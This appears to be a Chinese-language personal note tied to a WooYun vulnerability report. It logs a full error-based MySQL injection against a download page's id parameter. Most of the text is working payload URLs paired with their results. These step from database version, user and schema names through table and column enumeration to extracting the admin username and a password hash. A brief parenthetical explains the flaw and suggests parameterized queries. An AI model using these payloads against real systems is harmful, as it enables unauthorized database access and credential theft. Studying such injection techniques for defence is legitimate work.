http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试，没想到这有，可以测试下，做个记录而已。
（从下面的请求形式看，这是报错型 SQL 注入：id 路径段的值未经处理就拼进了查询，数据库报错又被回显到页面。修复应改用参数化查询，并关闭面向用户的错误回显。）
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd